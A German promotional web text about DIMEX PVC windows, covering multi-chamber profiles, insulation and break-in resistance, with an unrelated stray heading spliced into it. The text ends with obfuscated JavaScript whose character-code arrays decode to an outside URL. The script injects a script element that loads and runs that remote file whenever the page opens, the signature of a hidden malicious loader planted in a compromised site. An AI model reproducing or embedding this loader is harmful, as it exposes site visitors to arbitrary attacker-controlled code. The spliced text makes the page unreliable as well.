Dies verbessert nicht nur die Wärmedämmung, sondern verleiht durch die statischen Eigenschaften des Profils DIMEX Fenstern auch zusätzliche Stabilität und Robustheit gegenüber Einbruchversuchen. Moderne Produkte aus PVC sind dadurch in diesen Aspekten Aluminiumfenstern oder dem Fenster aus Holz kaum noch unterlegen und positionieren sich als eine echte Alternative zu diesen meist nur teuer erhältlichen Varianten.

Kunststoff als Material für hochwertige Fenster zu niedrigen Preisen

Native Reports & Dashboards

Im Laufe der letzten Jahrzehnte hat sich die Produktion von Fenstern rapide weiterentwickelt.Wo früher eine einzelne, dünne Glasscheibe in einem hölzernen Profil verbaut wurde, bieten die Unternehmen heute zu niedrigen Preisen ein breites Sortiment von zwei- oder dreifach verglasten Fenstermodellen mit Profilen aus Holz, Aluminium oder Kunststoff an.Durch die Mehr-Kammer-Technik werden beste Werte bei der Wärmedämmung erreicht.Schließlich gilt Wärmedämmung heute als für die Umwelt sowie für die Senkung der Heizkosten gleichermaßen wichtiges Element von Fenstern und Haustüren. Nirgendwo sonst ist diese Neuorientierung der Unternehmen offensichtlicher als im Bereich der Kunststofffenster.In der Frühzeit der Kunststofftechnik verfügte ein Kunststofffenster noch über ein statisches Profil ohne Kammern. Die schlechten wärmedämmenden Eigenschaften des Profils waren damit der größte Schwachpunkt der gesamten Fensterkonstruktion.Doch in der Zwischenzeit haben Unternehmen wie DIMEX Fenster entwickelt, die über ein sogenanntes Kammer-System verfügen. Bei diesem in der Alu- und Kunststofftechnik angewandten System besteht das Profil der fertigen Fenster aus mehreren Hohlkammern.

var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}